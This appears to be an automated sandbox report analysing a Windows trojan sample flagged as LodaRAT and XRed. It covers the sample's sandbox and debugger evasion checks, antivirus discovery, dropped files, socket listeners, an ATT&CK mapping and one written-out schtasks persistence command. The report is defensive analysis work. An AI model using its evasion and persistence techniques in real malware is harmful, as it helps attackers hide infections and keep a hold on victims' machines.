Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Window / User API: threadDelayed 5432			Jump to behavior
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Window / User API: foregroundWindowGot 1611			Jump to behavior

Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	API coverage: 6.5 %
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	API coverage: 3.8 %

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe TID: 7416	Thread sleep time: -54320s >= -30000s	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7336	Thread sleep time: -3300000s >= -30000s	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7384	Thread sleep time: -60000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\splwow64.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe

Thread sleep count: Count: 5432 delay: -10

Jump to behavior

Source: Yara match	File source: 0000000B.00000002.2529358776.0000000002946000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2538907548.00000000046D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2526904349.00000000026C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2526904349.00000000026E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ._cache_VKKDXE.exe PID: 7412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 7656, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\CXNFQD.vbs, type: DROPPED

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D5DD92 GetFileAttributesW,FindFirstFileW,FindClose,	3_2_00D5DD92
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D92044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	3_2_00D92044
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D9219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	3_2_00D9219F
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D924A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	3_2_00D924A9
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D86B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	3_2_00D86B3F
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D86E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	3_2_00D86E4A
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D8F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	3_2_00D8F350
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D8FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	3_2_00D8FDD2
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D8FD47 FindFirstFileW,FindClose,	3_2_00D8FD47
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E12044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	15_2_00E12044
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E1219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	15_2_00E1219F
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E124A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	15_2_00E124A9
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E06B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	15_2_00E06B3F
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E06E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	15_2_00E06E4A
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E0F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	15_2_00E0F350
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E0FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	15_2_00E0FDD2
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00DDDD92 GetFileAttributesW,FindFirstFileW,FindClose,	15_2_00DDDD92
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E0FD47 FindFirstFileW,FindClose,	15_2_00E0FD47

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe

Code function: 3_2_00D5E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

3_2_00D5E47B

Source: C:\ProgramData\Synaptics\Synaptics.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Windows\splwow64.exe	Thread delayed: delay time: 120000
Source: C:\Windows\splwow64.exe	Thread delayed: delay time: 120000

Source: C:\Users\user\Desktop\VKKDXE.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior

Source: Amcache.hve.28.dr	Binary or memory string: VMware
Source: Amcache.hve.28.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.28.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.28.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.28.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.28.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.28.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.28.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: ._cache_VKKDXE.exe, 00000003.00000002.2532068766.00000000011B7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1650418516.0000000000578000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000006.00000002.1650418516.00000000005C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.28.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.28.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.28.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.28.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: ._cache_VKKDXE.exe, 00000003.00000002.2532068766.00000000011B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.28.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.28.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.28.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.28.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.28.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.28.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.28.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.28.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.28.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.28.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.28.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.28.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.28.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.28.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.28.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.28.dr	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: Amcache.hve.28.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	API call chain: ExitProcess graph end node	graph_3-104243
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	API call chain: ExitProcess graph end node	graph_3-106849
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	API call chain: ExitProcess graph end node	graph_3-107764

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\ProgramData\Synaptics\Synaptics.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe

Code function: 3_2_00D9703C BlockInput,

3_2_00D9703C

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe

Code function: 3_2_00D4374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,

3_2_00D4374E

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe

Code function: 3_2_00D746D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,

3_2_00D746D0

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe

Code function: 3_2_00EA20B0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,

3_2_00EA20B0

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe

Code function: 3_2_00D6A937 GetProcessHeap,

3_2_00D6A937

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D68E19 SetUnhandledExceptionFilter,	3_2_00D68E19
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D68E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00D68E3C
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00DE8E19 SetUnhandledExceptionFilter,	15_2_00DE8E19
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00DE8E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_00DE8E3C

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe

Code function: 3_2_00D7BE95 LogonUserW,

3_2_00D7BE95

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe

Code function: 3_2_00D4374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,

3_2_00D4374E

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe

Code function: 3_2_00D84B52 SendInput,keybd_event,

3_2_00D84B52

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe

Code function: 3_2_00D87DD5 mouse_event,

3_2_00D87DD5

Source: C:\Users\user\Desktop\VKKDXE.exe	Process created: C:\Users\user\Desktop\._cache_VKKDXE.exe "C:\Users\user\Desktop\._cache_VKKDXE.exe"	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn CXNFQD.exe /tr C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe /sc minute /mo 1

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe

Code function: 3_2_00D7B398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

3_2_00D7B398

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe

Code function: 3_2_00D7BE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

3_2_00D7BE31

Source: ._cache_VKKDXE.exe, ZTCKPI.exe	Binary or memory string: Shell_TrayWnd
Source: ._cache_VKKDXE.exe, 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmp, ZTCKPI.exe, 0000000F.00000002.1382510134.0000000000E6E000.00000040.00000001.01000000.00000009.sdmp, ZTCKPI.exe, 00000016.00000002.1406983463.0000000000E6E000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe

Code function: 3_2_00D67254 cpuid

3_2_00D67254

Source: C:\Users\user\Desktop\VKKDXE.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe

Code function: 3_2_00D640DA GetSystemTimeAsFileTime,__aulldiv,

3_2_00D640DA

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe

Code function: 3_2_00DBC146 GetUserNameW,

3_2_00DBC146

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe

Code function: 3_2_00D72C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

3_2_00D72C3C

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe

Code function: 3_2_00D5E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

3_2_00D5E47B

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: Amcache.hve.28.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.28.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.28.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.28.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.28.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct

Stealing of Sensitive Information

Yara detected LodaRAT

Source: Yara match	File source: Process Memory Space: ._cache_VKKDXE.exe PID: 7412, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected XRed

Source: Yara match	File source: VKKDXE.exe, type: SAMPLE
Source: Yara match	File source: 0.0.VKKDXE.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1260396228.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VKKDXE.exe PID: 7300, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\Synaptics\RCX458E.tmp, type: DROPPED
Source: Yara match	File source: C:\Users\user\Documents\CZQKSDDMWR\~$cache1, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED

Source: ZTCKPI.exe, 00000023.00000002.2054692417.0000000000E6E000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
Source: ZTCKPI.exe, 00000023.00000003.2033242876.000000000404A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WIN_81
Source: ZTCKPI.exe	Binary or memory string: WIN_XP
Source: ZTCKPI.exe	Binary or memory string: WIN_XPe
Source: ZTCKPI.exe	Binary or memory string: WIN_VISTA
Source: ZTCKPI.exe, 0000000F.00000002.1390999232.000000000471A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WIN_81p
Source: ._cache_VKKDXE.exe, 00000003.00000002.2538675511.00000000046A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WIN_81-Z
Source: ZTCKPI.exe	Binary or memory string: WIN_7
Source: ZTCKPI.exe	Binary or memory string: WIN_8

Source: Yara match

File source: Process Memory Space: ._cache_VKKDXE.exe PID: 7412, type: MEMORYSTR

Remote Access Functionality

Yara detected LodaRAT

Source: Yara match	File source: Process Memory Space: ._cache_VKKDXE.exe PID: 7412, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected XRed

Source: Yara match	File source: VKKDXE.exe, type: SAMPLE
Source: Yara match	File source: 0.0.VKKDXE.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1260396228.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VKKDXE.exe PID: 7300, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\Synaptics\RCX458E.tmp, type: DROPPED
Source: Yara match	File source: C:\Users\user\Documents\CZQKSDDMWR\~$cache1, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D991DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	3_2_00D991DC
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D996E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	3_2_00D996E2
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E191DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	15_2_00E191DC
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E196E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	15_2_00E196E2

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	421 Scripting	2 Valid Accounts	11 Windows Management Instrumentation	421 Scripting	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	11 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	1 Replication Through Removable Media	2 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Peripheral Device Discovery	Remote Desktop Protocol	11 Input Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	2 Valid Accounts	1 Extra Window Memory Injection	21 Obfuscated Files or Information	Security Account Manager	1 Account Discovery	SMB/Windows Admin Shares	3 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Scheduled Task/Job	2 Valid Accounts	1 Software Packing	NTDS	4 File and Directory Discovery	Distributed Component Object Model	Input Capture	34 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	21 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	38 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	12 Process Injection	1 Extra Window Memory Injection	Cached Domain Credentials	1 Query Registry	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Scheduled Task/Job	12 Masquerading	DCSync	261 Security Software Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	21 Registry Run Keys / Startup Folder	2 Valid Accounts	Proc Filesystem	131 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	131 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	3 Process Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	21 Access Token Manipulation	Network Sniffing	11 Application Window Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	12 Process Injection	Input Capture	1 System Owner/User Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
VKKDXE.exe	86%	Virustotal		Browse
VKKDXE.exe	92%	ReversingLabs	Win32.Trojan.Synaptics
VKKDXE.exe	100%	Avira	TR/Dldr.Agent.SH
VKKDXE.exe	100%	Avira	W2000M/Dldr.Agent.17651006
VKKDXE.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\Synaptics\RCX458E.tmp	100%	Avira	TR/Dldr.Agent.SH
C:\ProgramData\Synaptics\RCX458E.tmp	100%	Avira	W2000M/Dldr.Agent.17651006
C:\ProgramData\Synaptics\Synaptics.exe	100%	Avira	TR/Dldr.Agent.SH
C:\ProgramData\Synaptics\Synaptics.exe	100%	Avira	W2000M/Dldr.Agent.17651006
C:\Users\user\AppData\Local\Temp\CXNFQD.vbs	100%	Avira	VBS/Runner.VPJI
C:\Users\user\Documents\CZQKSDDMWR\~$cache1	100%	Avira	TR/Dldr.Agent.SH
C:\Users\user\Documents\CZQKSDDMWR\~$cache1	100%	Avira	W2000M/Dldr.Agent.17651006
C:\ProgramData\Synaptics\RCX458E.tmp	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	100%	Joe Sandbox ML
C:\ProgramData\Synaptics\Synaptics.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\._cache_VKKDXE.exe	100%	Joe Sandbox ML
C:\Users\user\Documents\CZQKSDDMWR\~$cache1	100%	Joe Sandbox ML
